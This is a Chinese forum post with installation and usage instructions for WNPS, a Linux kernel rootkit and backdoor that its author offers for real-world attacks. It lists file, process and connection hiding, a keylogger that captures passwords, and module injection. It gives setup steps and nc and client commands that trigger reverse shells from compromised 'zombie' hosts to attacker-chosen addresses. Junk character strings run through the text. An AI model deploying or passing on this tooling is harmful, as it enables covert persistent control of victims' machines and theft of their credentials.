WNPS安装使用方法
" M! ~8 r) C p* T' X" b
wnps-0.26-beta2精简测试版, f, Q/ s+ s& g% Z
WNPS 简介:
6 m7 w- ]0 i$ G; K+ h9 F
; Q- h: ?% y. p: U+ F0 s/ [, rWNPS是一只工作在Linux 2.6.x平台下的rootkit+backdoor程序。0 h. p" O7 S* S
它的意思是wnps is not poc shell,我的意图在于将它设计成一个可用于实战的linux rootkit。1 g9 M9 g! L. K, q9 @' h# \
它最初的想法来自enyelkm,我对作者的开源精神深表感激。
9 T$ t" F. _$ v+ p q2 d2 r6 J( l, O6 |
开发平台:
% o! s* F& D! n9 ^) _# {! E5 X% ~& l5 z1 A' J
2.6.9-5.EL
. J+ F$ M* F4 r& S) ^
& j9 s6 j5 E4 U: K0 h+----------------------------------------------------------------------------------------+
% g' L: \* j3 T: O- x5 L h) R3 Z' p5 D) ^! l9 z
WNPS 功能特点:
( Z& M8 h8 ^1 k! t0 M: A* g+ X& _$ I0 [6 \% a: \
-=-=精简测试版只有文件隐藏,目录隐藏,网络连接隐藏,后门伪终端,传输加密这几个最基本的功能-=-=9 G/ d0 T: N* V5 ~9 Q) B, \6 J$ A* w
1 S H' k& O; i6 I# F, l, ?1、隐藏
6 w; b9 C. R/ Y1 }4 h* L2 r8 p G
隐藏指定文件
9 P4 z z, K7 B+ W8 N: \ 隐藏文件中特定的内容
6 y5 O( g& p: k: X 隐藏进程1 \/ l1 z/ d5 `0 L7 @9 `
动态隐藏网络连接、进程-->用过sk的都知道什么是动态隐藏
2 ^4 t, z3 M/ l X8 N 隐藏自身模块/ }' u/ [, I5 h. ]" y
保护相关模块、进程、文件不被跟踪' i+ h8 c5 O* s( |, H4 k9 B
2 @' d+ v7 f( h w U
2、内核反弹后门+ B6 \1 }; `# |8 ]
. W$ {2 h+ w3 q+ Y- C( j 即使肉鸡没有开放任何TCP UDP端口并过滤icmp包,只要肉鸡让回连,我们就可以获得shell
& S2 E$ w8 \, I+ A! B9 }, H) ] 跨内核平台简易安装,拿着一个wnps.ko就可以管理所有2.6内核的机器,所有要做的事情只是执行insmod wnps.ko9 x4 O& c3 c4 b+ t( e+ R3 R i. E
完美的伪终端支持,让你用起来更顺心' L3 u% v) \. Y7 A3 K
可以设置定时自动回连,即使你的肉鸡在内网的深处,也不用担心她跑路7 h. v, V, j) P1 _" ^/ x1 C
; D% {8 E3 R8 m* ?8 F" L+ t- ^, U
3、键盘记录功能
3 \# q/ Q- W$ i- f. F 想看看有没其他人在你的肉鸡里跳舞?这个是最好的办法,还可以通过键盘记录把别人的肉鸡给抢了,怎么抢,自己发挥想像空间吧。键盘记录功能对渗透和保护肉鸡都有相当重要的意义。键盘有两种模式,一个是密码模式,就是专门记录密码相关的了,只要触发了相关特征字符串,我们就记录下相应的内容,还有一个就是完全记录模式了,顾名思义了。
8 p' Q: n8 P) [: V2 n5 p1 G" w- P3 O$ u' L- R# o T! h7 X5 C5 R0 y) a( R! I
4、模块注射3 c" H5 `, S! Z! H$ r
比adore-ng更稳定的模块注射方式
5 b2 q" ` ^9 S1 ]- Q
, n L+ G9 v6 }5 j5、通讯加密& p& K; V: _: o8 t1 Z
& L/ l, E, I; c3 z$ d2 N
+----------------------------------------------------------------------------------------+
& |: F, ^- p) ?: C% q% ]& T' \* u
. V9 Q5 G' Z6 D: X6 |WNPS 用法:
. |* n: R- a6 ^, v' |/ x4 ?! ?/ k0 q
服务端使用说明:) o! F1 b2 R) A+ `7 |% O
& [- y' X3 _, `# E' b
在安装之前,请先修改wnps目录下的config.h!!!" {# |8 ^6 f8 T' [
6 f# R$ N/ q% X, g5 l @- q4 t& W
TCP_SHELL_KEY 表示要发送的主机密码,默认为@wztshell
2 C# V% a! v5 c7 ^$ `0 Z0 D+ q$ ?( XHIDE_FILE 表示我们将隐藏以HIDE_FILE字符为前缀的文件
* i, h& J. u3 O1 ^* G7 u7 ]HIDE_TASK 表示我们将隐藏以HIDE_TASK字符为前缀的进程
+ h1 i# Y7 k$ Y1 O0 ^HIDE_STR 表示我们将隐藏在文件中以HIDE_STR字符为前缀的字符串
! F c2 x5 ?4 z+ n, f, b$ Y) F( H) T ^# r& z% f
HIDE_OPEN 表示我们将隐藏文件中位于HIDE_OPEN和HIDE_CLOSE之间的内容5 H2 ~) @7 n3 D3 ]+ h' ?
HIDE_CLOSE/ u" J$ I8 h2 k" H2 u* h4 `
" q! A+ N `- V: D8 e
主机需要能够被安装模块以及提供内核源代码。
% J) @$ ?( m8 ~" p( v% E6 V; s
" n0 q# H l' a6 p) {& O( o: L2 emake;make install
7 Y* U( O2 Y; w9 T( B9 j: E& R) w. O. `1 l3 D
+----------------------------------------------------------------------------------------+
* n" u) \+ _! H& {0 l3 c" E+ ]
* Y2 z/ [! b: P& N9 T8 a" g3 L: b# I: _客户端使用说明:9 V, \4 c! f" U3 y8 a7 c0 v
6 o% h9 V p9 P; r* a' \
WNPS的客户端将被设计成可以工作在linux和win平台上使用。) S* Z a4 h0 ~$ j
& H" v9 y8 v4 K- a: ?6 k
1。即可以发送tcp数据报来激活shell,又能用nc来连接服务器的某一端口来发送密码,以及
# H5 A. a3 y" H* b5 I反弹ip和port。
5 \$ q- Q5 F3 T, h! E& U/ E& K* l
" d+ u a$ ?- t% h2。使用方法简单灵活
% ]7 }9 J2 _9 j9 K5 g/ P' ~3 G: X
- j( S' o( l! U" O注意:如果要使用nc做客户端,请先修改服务端和客户端的config.h中的- t! B/ Y( |% v: p
ENCRYPT 为0。也就是不支持传输加密的功能。9 t, ?( a7 A% z z
: U' U1 ]$ H# ?# \7 w
1).在windows平台下,可以用nc作为客户端,连接肉鸡任意开放的一个端口。7 y: q6 J, i, N. f; Q8 M! R
( A% w0 U2 P; Y4 T$ i+ ]/ Y
比如:5 F8 G: ]2 P8 P2 ^) E. W& o' i
./nc -vvlp 8899
( n$ Y, B8 s2 U& J8 e7 V ./nc -vv target_ip 22 然后输入密码,反弹ip和port.即可在8899端口获得一个shell。
9 V9 H- ^/ _; F i5 U
5 l: A7 u: F E, E (1).在本机的8899端口获得一个远程shell。9 E) B) u' I* q, a
@wztshell:5566, l" r1 C- b( i, I
' P% ?6 r3 ~, l (2).在192.168.75.128的5566端口获得一个远程shell。/ O8 o4 G3 f- c' N! i- R
@wztshell:192.168.75.128:5566
! ?& h/ h# W4 O9 L6 z& F/ C( n 0 w z& {3 d: i% \' _
2).在linux平台下,即可用nc作为客户端,又可采用自带的client作为客户端,并且允许发送
( A/ a" ]- L( R: h tcp数据报来激活远程shell。, p2 u. H4 e6 _3 a$ O3 t y
6 i6 s: I4 h. ~2 A* l( w ./client <optinons>3 \2 o# k4 `1 j9 S5 U- f: p
optinons:) r/ z2 \6 y' O R3 U( I" b
-tcp|packet <victim ip> [victim port] [connect back ip] [connect back port]
- Q7 V6 b7 G* D -listen [port]
# e8 H6 R" a* q
l9 \* B. h- ]/ p3 R1 |0 ^# |2 B -listen <port> 在本地监听某一端口
% I/ u1 G ^# k# f
1 W( {6 c% i/ ]* K5 h2 } -tcp 发送tcp数据报,激活远程shell6 T7 i5 k E# l
<victim ip> 为远程服务器地址,必须填写这个参数。
! d' O# Y* l8 a) S1 { [victim port] 为远程服务器开放的端口,默认将会自动扫描常用开放的端口,在send.h里定义。' Z6 I. `/ x6 z& i: G
[connect back ip] 为你要反弹回的主机地址,默认是本机公网ip地址,必须是可以让肉鸡能够回连的地址。& Z! J2 j) A% B, c1 _" z! m" }$ U
[connect back port] 为你要反弹回的主机端口,默认为8899,在config.h里定义。 L! s$ A/ y. F% v, K$ Y
: D, d3 }1 P% Q2 b6 F2 M +----------------------------------------------------------------------------+
X( w2 x& w( C' X9 N 你可以很灵活的来使用WNPS的client。client默认的监听端口为8899,在client/config.h中设置5 o- G' Z5 p& S+ z9 G: W
设肉鸡ip为:192.168.75.130" i# l: A7 W- x/ O$ l- Z% @+ u' b
注意:如果是要在client端所在的主机上获得远程shell,无须使用-listen选项!; R4 g! D( M0 l- w7 ]# i% @
: j" g5 U) L u6 R/ v8 ^3 t) H! L (1).在本机的8899端口上获得一个远程shell。' N; e. F/ J$ r9 J# W) B9 u
./client -tcp 192.168.75.130 n/ Q2 h: F+ w9 Z d' F) Q
3 e6 ?/ }% D: p0 Y, f, V" U+ r
(2).向肉鸡的22端口发送数据报,然后在本机的8899端口上获得一个远程shell。% T' W2 Z4 O$ r8 r
./client -tcp 192.168.75.130 22
' [+ F+ A( a. o, \3 m , G( H3 ^ z% E
(3).向肉鸡的22端口发送数据报,然后在本机的5566端口上获得一个远程shell。' m+ Z% F8 T j3 L. K& U
./client -tcp 192.168.75.130 22 5566
0 B. H/ I; N% L! u; G5 k 5 H8 f$ h, ~/ I+ @
(4).在192.168.75.128的8899端口上获得一个远程shell。
! u4 K" f& ]) \- ]" f" \8 c- O 先在192.168.75.128上使用: M, t* m8 L( F# r- g) R0 C; M# z, k3 n
./client -listen/ \( r& j4 ~) J0 g$ R% n
5 L6 x, x2 \1 F" C2 D 然后在client所在的主机上使用:
# R7 a i( c# G4 m9 x) \5 B2 b ./client -tcp 192.168.75.130 192.168.75.1286 j4 X7 p4 h" u
5 t; a! c5 i$ U. a, b/ c
(5).在192.168.75.128的5566端口上获得一个远程shell。
! }4 G P5 a! `, k, R# x' z% s9 A ./client -listen 5566
9 {' ^4 J `& B' _' B) f ./client -tcp 192.168.75.130 192.168.75.128 55663 c2 ]' k8 h% U4 T4 I4 V7 V, T2 f
' _0 B) f8 {, R. Z) Z3 ?" V
(6).向肉鸡的22端口发送数据报,然后在192.168.75.128的5566端口上获得一个远程shell。
. f2 C; ^1 I* y7 ^3 k ./client -listen 5566
7 c. o& I2 m! O S9 `6 Y ./client -tcp 192.168.75.130 22 192.168.75.128 5566
附件: 您所在的用户组无法下载或查看附件
搜索更多相关主题的帖子:
后门 rootkit backdoor WNPS 网络
